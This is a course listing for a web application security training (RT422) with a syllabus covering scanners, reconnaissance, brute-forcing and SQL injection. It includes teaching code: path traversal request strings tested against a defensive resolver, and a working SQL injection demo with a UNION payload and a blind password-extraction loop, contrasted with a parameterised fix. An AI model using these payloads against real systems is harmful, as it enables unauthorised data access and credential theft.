Web Application Security
Intermediate
RT422
Description
The Web Application Security course helps participants understand the major classes of web application flaws and how they are exploited, and teaches a proven process for locating these flaws consistently.
The primary goal of this training program is to help security specialists understand the web application risks in their organization, conduct web application security assessments, mitigate the vulnerabilities they find, and write technical reports.
How to make the most of this course?
In order to succeed in the course, the following requirements must be met:
- Participation in all practical laboratories
- Self-work at home between lessons
- Reviewing the material, self-study, and completing the assigned tasks
In addition to regular classroom studies, the participant is required to practice at least 10 hours a week in order to gain practical experience in the field.
The participant will also need a personal computer capable of running virtual machines, with a broadband Internet connection.
Target audience
- Security practitioners
- Penetration testers
- Ethical hackers
- Web application developers
Objectives
- Discovering and mitigating website vulnerabilities
- Using tools to automate your tasks
- Securing web servers from attacks
Pre-requisites
- Basic Web Development
- Basic Cybersecurity knowledge
Syllabus
Description
In this module, participants learn the building blocks of web applications (HTML, PHP, and HTTP) and the core web application security concepts that follow from them: architecture and entry points, authentication and authorization, session management, and file handling.
Technical content
- WebApp Basics
o HTML
▪ Basic Tags
▪ Learning to Format
o PHP
▪ Basic Syntax
▪ Defining Variables
o Combining HTML and PHP
o HTTP Response Codes
- WebApp Concepts
o Web Application Architecture
▪ Client, Server, and Database
▪ Fingerprinting Websites
▪ Robots.txt Structure
▪ Understanding Entry Points
o Authentication Vulnerabilities
▪ Authentication vs. Authorization
▪ Role-Based Access Control
▪ Securing the Admin Interface
▪ Parameter Tampering
▪ SSL vs. TLS
▪ HTTPS Encryption
o Session Management
▪ Management Techniques
▪ Cookies
▪ Long Session Timeout
o File Handling
▪ Path Traversal
▪ Handling File Size and File Type
▪ Insecure File Extension Handling
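As an added illustration of the Path Traversal and Insecure File Extension Handling topics above (example code written for this page, not course material): a download-path resolver that rejects the usual traversal bypasses and enforces an extension allow-list, tried against a set of constructed requests. The directory layout, file names, allow-list and request strings are all assumptions made for the demonstration.

```python
"""Added illustration for the File Handling topics above; not course material.
The download directory, file names and request strings are all constructed
for this demonstration."""
import os
import posixpath
import tempfile
import urllib.parse
from typing import Optional

# Assumed policy for the demo: only these final extensions may be served.
ALLOWED_EXTENSIONS = {".txt", ".pdf", ".png"}


def safe_resolve(base_dir: str, user_path: str) -> Optional[str]:
    """Return the absolute path to serve, or None to reject the request.

    Rejects traversal out of base_dir (plain, URL-encoded and double-encoded
    '..', backslash separators, symlinks pointing outside), absolute paths,
    NUL bytes, and names whose *final* extension is not allow-listed, so
    'shell.php.txt' is served but 'shell.txt.php' is not."""
    # Decode twice: double-encoding (%252e%252e) is a classic bypass of a
    # filter that only decodes once.
    decoded = urllib.parse.unquote(urllib.parse.unquote(user_path))
    if "\x00" in decoded:
        return None
    # Treat Windows-style '..\' the same as '../'.
    decoded = decoded.replace("\\", "/")
    if posixpath.isabs(decoded):
        return None
    base = os.path.realpath(base_dir)
    # realpath also resolves symlinks, so a link inside base_dir that points
    # outside it is caught by the containment check below.
    candidate = os.path.realpath(os.path.join(base, decoded))
    if os.path.commonpath([base, candidate]) != base:
        return None
    if os.path.splitext(candidate)[1].lower() not in ALLOWED_EXTENSIONS:
        return None
    if not os.path.isfile(candidate):
        return None
    return candidate


def run_demo() -> dict:
    """Build a throw-away directory tree and try constructed requests against
    it. Returns {request: True if it would be served, False if rejected}."""
    root = tempfile.mkdtemp()
    public = os.path.join(root, "public")
    os.makedirs(os.path.join(public, "reports"))
    for name in ("notes.txt", "reports/q1.pdf", "shell.txt.php", "shell.php.txt"):
        with open(os.path.join(public, name), "w") as fh:
            fh.write("sample")
    with open(os.path.join(root, "secret.txt"), "w") as fh:  # outside public/
        fh.write("not for download")
    requests = [
        "notes.txt",                 # plain file, allowed extension
        "reports/q1.pdf",            # subdirectory, allowed extension
        "shell.php.txt",             # final extension .txt: served
        "shell.txt.php",             # final extension .php: rejected
        "../secret.txt",             # classic traversal
        "reports/../../secret.txt",  # traversal through a real subdirectory
        "%2e%2e/secret.txt",         # URL-encoded dots
        "%252e%252e/secret.txt",     # double-encoded dots
        "..\\secret.txt",            # backslash traversal
        "/etc/passwd",               # absolute path
        "notes.txt%00.php",          # NUL byte (extension truncation trick)
    ]
    return {req: safe_resolve(public, req) is not None for req in requests}


if __name__ == "__main__":
    for req, served in run_demo().items():
        print(f"{'SERVED  ' if served else 'REJECTED'} {req!r}")
```

The decisive control is the containment check on the fully resolved path, not the string filtering before it; the decoding and separator normalisation only make sure the check sees the same path the operating system will open.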
Description
In this module, participants learn how to work with web application scanners and reconnaissance tools, review their reports and interpret the data they provide, and limit the leakage of sensitive data that such tools can collect about an organization.
Technical content
- Scanning
o Vulnerability Scanners
▪ Nikto
▪ Grabber
▪ Zed Attack Proxy
▪ SQLmap
▪ Wfuzz
▪ W3af
▪ Vega
▪ Wapiti
o DNS Enumeration
▪ DIG
▪ DNSRecon
▪ DNSEnum
▪ Fierce
- Analyzing
o Directory Discovery
▪ Dirbuster
▪ Dirb
o Reconnaissance Tools
▪ theHarvester
▪ Whois and DMitry
▪ Maltego
▪ OSINT Framework
Description
In this module, participants learn about the most common vulnerability classes in web applications, how each can be exploited, and what impact a successful exploit could have.
Technical content
- Understanding Code Injection
o XML External Entities (XXE)
o Cross-Site Scripting (XSS)
o Finding Exposed Sensitive Data
o Abusing Security Misconfiguration
o Broken Authentication
o Bypassing Broken Access Control
o Insecure Deserialization
o Finding Components with Known Vulnerabilities
o Insufficient Logging and Monitoring
Description
In this module, participants learn the basics of testing web applications for security weaknesses, either by brute force (for example against login pages) or by exploiting a vulnerability such as SQL injection.
Technical content
- Attacking Basics
o Burp Suite Fundamentals
o Web Application Firewall (WAF) Detection
▪ Wafw00f
▪ HTTP Headers
o Brute-Forcing Login Pages
▪ Crafting Wordlists using Cupp and Crunch
▪ Using Burp Suite and Hydra
o SQL Database Attacks
▪ Union-Based
▪ Blind Injection
▪ Burp Suite Automated SQL Attacks
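As an added illustration of the union-based and blind SQL injection topics above (example code written for this page, not course material): a deliberately string-built search query next to its parameterised counterpart, the ORDER BY probe that finds the column count, a UNION payload that appends the users table to the result, and a boolean-based blind loop that recovers a password one character at a time. An in-memory SQLite database with constructed tables and rows stands in for the PHP application the course uses, and all names and values are assumptions made for the demonstration.

```python
"""Added illustration for the SQL Database Attacks topics above; not course
material. Schema, rows and the 'secret' password are constructed for the demo,
and an in-memory SQLite database stands in for the course's web application."""
import sqlite3

CHARSET = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"


def make_db() -> sqlite3.Connection:
    """Constructed data: a notes table the page searches, and a users table
    the attacker wants to read."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE users(id INTEGER, username TEXT, password TEXT);
        INSERT INTO users VALUES (1, 'admin', 'S3cretPa55');
        INSERT INTO users VALUES (2, 'alice', 'wonderland');
        CREATE TABLE notes(id INTEGER, body TEXT);
        INSERT INTO notes VALUES (1, 'public note');
    """)
    return con


def search_notes_vulnerable(con, term):
    """The kind of search the labs exploit: user input is pasted into the SQL
    text, so quotes, UNION and comment markers in it are parsed as SQL."""
    sql = f"SELECT id, body FROM notes WHERE body LIKE '%{term}%'"
    return con.execute(sql).fetchall()


def search_notes_safe(con, term):
    """Same search with a bound parameter: the input is only ever data."""
    sql = "SELECT id, body FROM notes WHERE body LIKE ?"
    return con.execute(sql, (f"%{term}%",)).fetchall()


def count_columns(con, search, limit=10):
    """First step of a union attack: probe ORDER BY n until the database
    errors; the last n that worked is the column count of the original
    SELECT. Returns None if no error appears within `limit` (no injection)."""
    for n in range(1, limit + 1):
        try:
            search(con, f"x%' ORDER BY {n} --")
        except sqlite3.OperationalError:
            return n - 1
    return None


# Union-based: match the two columns of the original SELECT and append the
# users table to the result set. '--' comments out the trailing %'.
UNION_PAYLOAD = "x%' UNION SELECT username, password FROM users --"


def blind_extract_password(con, search, username="admin", max_len=32):
    """Boolean-based blind injection: nothing from users is echoed, but
    'some rows or none' leaks one bit per request, which recovers the
    password one character at a time. Stops when no character matches."""
    recovered = ""
    for pos in range(1, max_len + 1):
        for ch in CHARSET:
            payload = (f"zzz%' OR (SELECT substr(password,{pos},1) FROM users "
                       f"WHERE username='{username}')='{ch}' --")
            if search(con, payload):      # rows came back: the guess is right
                recovered += ch
                break
        else:
            break                         # no character matched: end of string
    return recovered


if __name__ == "__main__":
    con = make_db()
    print("columns:", count_columns(con, search_notes_vulnerable))
    print("union  :", search_notes_vulnerable(con, UNION_PAYLOAD))
    print("blind  :", blind_extract_password(con, search_notes_vulnerable))
    print("safe   :", search_notes_safe(con, UNION_PAYLOAD),
          repr(blind_extract_password(con, search_notes_safe)))
```

Run against the parameterised search, every payload is just a LIKE pattern that matches nothing: no column count is revealed, the UNION returns no rows, and the blind loop recovers an empty string. That contrast, rather than the payload syntax, is the point to take from the example.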
Labs
- Lab 1 HTML and PHP
- Lab 2 Injecting Data
- Lab 3 Using Scanners
- Lab 4 SSL/TLS Vulnerabilities
- Lab 5 Hijacking Sessions
- Lab 6 File Handling
- Lab 7 Burp Suite Advanced
- Lab 8 SQL Injections
Real Case Studies
Course type
This course is delivered in the following ways:
- Virtual classroom with proctored labs and scenarios executed in our Cyberium Arena
- On-site classroom with proctored labs and scenarios executed in our Cyberium Arena
All sessions are recorded and attendees can replay them for 30 days. All course material is made available to the participant electronically.
Course Group: FOUNDATION
Hands-on / Theory Mix
This course incorporates a high proportion of hands-on lab exercises, as well as real-life case studies.
Certification
This course prepares the participant for the following certifications:
- GWEB (SANS)
- OSWE (Offensive Security)
Required Equipment
Network connection
As this course makes extensive use of a cloud-based Learning Management System, including a lab arena, attendees need a stable broadband Internet connection.
BYOD – Bring Your Own Device
As this is a very practical course, participants need a laptop with the following capabilities in order to make the most of it:
- Audio and video
- 8 GB RAM
- 200 GB free disk space
- Virtualization support (able to run the latest version of VirtualBox or a similar virtual machine application)
- A good headset with microphone